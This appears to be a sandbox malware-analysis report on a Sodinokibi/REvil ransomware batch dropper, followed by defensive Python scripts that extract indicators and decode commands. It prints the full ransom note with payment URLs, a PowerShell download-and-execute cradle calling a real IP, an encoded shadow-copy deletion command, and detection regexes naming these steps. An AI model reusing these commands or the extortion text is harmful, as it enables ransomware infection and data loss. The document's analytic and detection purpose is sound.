Analysis

  • max time kernel
    29s
  • max time network
    52s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    04-05-2020 09:10

General

  • Target

    Evb87yyM.bat

  • Size

    190B

  • MD5

    8e4d79c1afbe60f75e7f18f5e125dd5e

  • SHA1

    45a3951131e3b20026690d0d5f3ce0a84d633e31

  • SHA256

    46f6f9a88c6598831db0c71784a9cce294f3647121cba6e7dafe783523aac095

  • SHA512

    3b56433e7e0f688e1c39dac8e3c12e1537ca8c6c6f8dd24cb780ec8d24f6d21c2381eacb1ae4a0785a826f207e8606e3ded0ab904fe86cff10d45c67efa3f3a2

Malware Config

Extracted

  • Language
    ps1
  • Source
    ps1.dropper
  • URLs
    http://185.103.242.78/pastes/Evb87yyM

Extracted

  • Path
    C:\2gq13331ju-readme.txt
  • Family
    sodinokibi
  • Ransom Note

    ---=== Welcome. Again. ===---
    [+] Whats Happen? [+]
    Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 2gq13331ju.
    By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
    !!!!!!!!!! We have downloaded your documents, databases, documents of your customers, correspondence. We are ready to put everything in public access if you don't contact us !!!!!!!!!!!!
    [+] What guarantees? [+]
    Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
    To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
    If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
    [+] How to get access on website? [+]
    You have two ways:
    1) [Recommended] Using a TOR browser!
    a) Download and install TOR browser from this site: https://torproject.org/
    b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/48C1B3A143AB7DAE
    2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
    a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
    b) Open our secondary website: http://decryptor.cc/48C1B3A143AB7DAE
    Warning: secondary website can be blocked, thats why first variant much better and more available.
    When you open our website, put the following data in the input form:
    Key:
    cTyFGpNNHpdGJF/PUDYRXXmRPygk+4p6Zo9sf8Mu4y3sNOuBbehEmT2RY4txNmy7
    O3q9gUSulbCBZhwu01cZ99jUCCNfg82LRV8ZtTh0jzvzke0k7xMn9wqSHbnJXps4
    MdJW+uZeU4hOVLxZNrbkPIyXoD69xI5F7aSESSinrbjwSXedcTCJ9e/sCtQdsata
    Lrbb3RxoG0nf3dX2NvA58EDoS6xNPOoRAJaSGuQvycPwu3E3Nwk86Bb1xpUIwcGS
    ejyh9Q/THleULF9T+gqKFfthvQmwWMYM04uiPNusfbdFCVsAzPR3cZr14qM71Hde
    eruKyjKeB3wqkCk6Jj4+QMQCzVptqc2MmBeErYsdEkwv+zT1hYjEHSJltizH+yIr
    WaeHm+66/mULe88TcjBvBABEhOj+RFz7jMxSEvXvRnzz2FM83Xv98OoxCRu9xD5B
    i+lXXoUqSe74SnWiFmXykmM2b0jolcRziUqEhJQtbzCIhH/phv82VQFiB2L2FYm9
    4hmgQHqwBki38ZmL0cegSez0dZPtkpC5T1s1F0MjUSw0Dm0J7t827J+ad8h12VaV
    dc+pEUWBQj9QaCEdJW8gqLBV47jBmPnt+Sq1FDRGfD/V7sJXTSYxAlgICGs/auRT
    ZURoweya54tm4etnqdJAndE9cYA7w8oeXC6rvntJPs7YZcVFDglNApS3i2V52Rne
    OrFHmJL0xJN8nZiVFxIm7gvyE+KtM/OVlvBCYK7C0e1fAdIrkMadkYu/MkF+w2s+
    qqPbLYkJXO8JRCKmumhM/EbKFatwKH+mFOmooPNOmI7EtD/ddr3PuEte0Brd4e1N
    38KG5M2V7oWTnFdSm30pcqi3ela+UxU1ea59hsi2v/BbyYmxgMdYoEBH365h/F3Z
    +NvbJCbZ+BIF+p5LG1A+OHOJcOEW4IXxeZm+Cfx9tILZxR4m9PF6nf+iDLBqBltg
    h9/jTeC4ShqXyQLEj4TKAX4dYbhgCI6wRt2vEH/uGGBZk6OWRtOoWxpDdKWWC9pE
    PrWE6/50qyD8Fp2+U99RGmlhVc2/FWNFGASAdM0UY8dGa0T3B8OucVfftK3VsWXT
    oHmccFJcPEP0WrVr1kniHHYaEizi3gZ2vVjTeTP4VGR50ZZSvGxLvcRwuzfqsGQP
    kIW3AFLDpy0wHUE95e4Th7Spns9x1ZzH7DIhV0UhNr5ni/gJm5J2+Skm9wqabUfJ
    0MJTjLSUhoEvI4TyAGLWFVNM3mvDDVw5KyQ8v8M0Sn4Ye1vxF8TrrMTiLm9OuenE
    qDN9MXviDUErc2SaqS7OHpMCuw12WUxyXw3xkGUBqBWxyxELMtov2Q==
    -----------------------------------------------------------------------------------------
    !!! DANGER !!!
    DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
    !!! !!! !!!
    ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
    !!! !!! !!!

  • URLs
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/48C1B3A143AB7DAE
    http://decryptor.cc/48C1B3A143AB7DAE
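The extracted note above carries the indicators an analyst usually pulls out by hand: the per-victim file extension, the victim ID that both panel URLs share, the .onion and clearnet panel addresses, and the base64 "Key" blob. The script below is an added example (not part of the sandbox report) that extracts those fields from the note text and checks that the dropped readme name matches the extension, which is how this family names its note. The note excerpt is constructed from the report's own wording and abridged; the regular expressions and the 16-hex-digit victim-ID pattern are assumptions based on this one sample, not a family-wide specification.

```python
import re

# Constructed, abridged excerpt of the extracted ransom note from the report
# above (wording copied from the report; most of the body is omitted).
NOTE_PATH = r"C:\2gq13331ju-readme.txt"
NOTE_EXCERPT = (
    "---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, "
    "and currently unavailable. You can check it: all files on your system has "
    "extension 2gq13331ju. "
    "a) Download and install TOR browser from this site: https://torproject.org/ "
    "b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/48C1B3A143AB7DAE "
    "b) Open our secondary website: http://decryptor.cc/48C1B3A143AB7DAE "
    "When you open our website, put the following data in the input form: "
    "Key: cTyFGpNNHpdGJF/PUDYRXXmRPygk+4p6Zo9sf8Mu4y3sNOuBbehEmT2RY4txNmy7 "
    "O3q9gUSulbCBZhwu01cZ99jUCCNfg82LRV8ZtTh0jzvzke0k7xMn9wqSHbnJXps4 "
    "----------------------------------------------------------------------------------------- "
    "!!! DANGER !!! DONT try to change files by yourself"
)

# Assumed patterns, derived from this sample's note only.
EXT_RE = re.compile(r"extension\s+([a-z0-9]{5,12})\b")
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")
# v2 (16 char) or v3 (56 char) onion hostnames, base32 alphabet only.
ONION_HOST_RE = re.compile(r"^https?://(?:[a-z2-7]{16}|[a-z2-7]{56})\.onion(?:[/:]|$)")
VICTIM_ID_RE = re.compile(r"/([0-9A-F]{16})/?$")
# "Key:" followed by one or more whitespace-separated base64 chunks.
KEY_RE = re.compile(r"Key:\s*((?:[A-Za-z0-9+/=]{20,}\s*)+)")


def extract_iocs(note_text, note_path=None):
    """Pull extension, victim ID, panel URLs and key blob out of a note."""
    ext = EXT_RE.search(note_text)
    extension = ext.group(1) if ext else None

    onion_urls, panel_urls, other_urls, ids = [], [], [], set()
    for url in URL_RE.findall(note_text):
        url = url.rstrip(".,;)")
        vid = VICTIM_ID_RE.search(url)
        if vid:
            # URLs carrying the victim ID are the payment/decryptor panel.
            ids.add(vid.group(1))
            panel_urls.append(url)
        else:
            other_urls.append(url)
        if ONION_HOST_RE.match(url):
            onion_urls.append(url)

    key = KEY_RE.search(note_text)
    key_b64 = "".join(key.group(1).split()) if key else None

    # The note is dropped as <extension>-readme.txt; confirm the path agrees.
    readme_ok = None
    if note_path and extension:
        basename = note_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        readme_ok = basename == f"{extension}-readme.txt"

    return {
        "extension": extension,
        # Only trust the ID when every panel URL agrees on it.
        "victim_id": next(iter(ids)) if len(ids) == 1 else None,
        "onion_urls": onion_urls,
        "panel_urls": panel_urls,
        "other_urls": other_urls,
        "key_b64": key_b64,
        "readme_matches_extension": readme_ok,
    }


if __name__ == "__main__":
    for field, value in extract_iocs(NOTE_EXCERPT, NOTE_PATH).items():
        print(f"{field}: {value}")
```

The victim ID is the join key between the note, the panel URLs and any later network telemetry, so it is returned only when all panel URLs carry the same value; a note that mixes IDs is worth a manual look rather than an automatic match.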

Signatures

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Makes http(s) request 1 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Drops file in Program Files directory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Evb87yyM.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:888
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Evb87yyM');Invoke-FLEYEFI;Start-Sleep -s 10000"
      2⤵
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      PID:1292
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:784
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1724
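The process tree above is the whole infection chain in three command lines: cmd.exe runs a .bat from the user's Temp directory, that batch file starts PowerShell with an IEX/DownloadString cradle against the paste URL, and the downloaded code in turn launches a second PowerShell with an -e (EncodedCommand) payload. The script below is an added example (not part of the report) that decodes the -e payload (base64 of UTF-16LE, as powershell.exe expects), applies a few command-line rules to the tree, and walks the parent chain. The process list is constructed from the PIDs, images and command lines shown above; the rule names and regular expressions are the author's assumptions, not the sandbox's own signatures.

```python
import base64
import binascii
import re
from collections import defaultdict

# Constructed from the process tree in the report above (PIDs and parentage as
# listed there; vssvc.exe is left out because its command line is just the image).
PROCESSES = [
    {"pid": 888, "ppid": None,
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\Evb87yyM.bat"'},
    {"pid": 1292, "ppid": 888,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Evb87yyM');Invoke-FLEYEFI;Start-Sleep -s 10000"'''},
    {"pid": 784, "ppid": 1292,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="},
]

# -e, -ec, -enc and -EncodedCommand (powershell.exe accepts unambiguous prefixes).
ENC_FLAG_RE = re.compile(r"(?i)(?:^|\s)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)")

# Assumed detection rules, matched against the command line plus any decoded payload.
RULES = [
    ("bat_from_temp", re.compile(r'(?i)\\Temp\\[^\\"\s]+\.bat\b')),
    ("download_cradle", re.compile(r"(?i)\bIEX\b.*DownloadString|DownloadString.*\bIEX\b|Invoke-Expression")),
    ("encoded_command", ENC_FLAG_RE),
    ("long_sleep", re.compile(r"(?i)Start-Sleep\s+-s(?:econds)?\s+\d{4,}")),
    ("shadow_copy_delete", re.compile(
        r"(?i)Win32_Shadowcopy.*Delete\(|vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete")),
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        # EncodedCommand is base64 over the UTF-16LE bytes of the script.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyse(processes):
    """Map pid -> set of rule names that fired; also return decoded payloads by pid."""
    findings, decoded = defaultdict(set), {}
    for p in processes:
        text = p["cmdline"]
        plain = decode_encoded_command(text)
        if plain is not None:
            decoded[p["pid"]] = plain
            text = text + "\n" + plain  # let rules see what the payload actually does
        for name, rx in RULES:
            if rx.search(text):
                findings[p["pid"]].add(name)
    return dict(findings), decoded


def ancestry(processes, pid):
    """Image basenames from the root of the tree down to pid."""
    by_pid = {p["pid"]: p for p in processes}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"].rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    hits, plain = analyse(PROCESSES)
    for pid in sorted(hits):
        print(pid, " -> ".join(ancestry(PROCESSES, pid)), sorted(hits[pid]))
    for pid, script in plain.items():
        print(f"pid {pid} decoded: {script}")
```

Matching the rules against the decoded payload as well as the raw command line is the point: the shadow-copy deletion is invisible to a rule that only looks at the literal -e argument, and the same encoding trick hides vssadmin and wmic variants just as well.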

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/1292-12-0x0000000008F99000-0x0000000009009000-memory.dmp

    Filesize

    448KB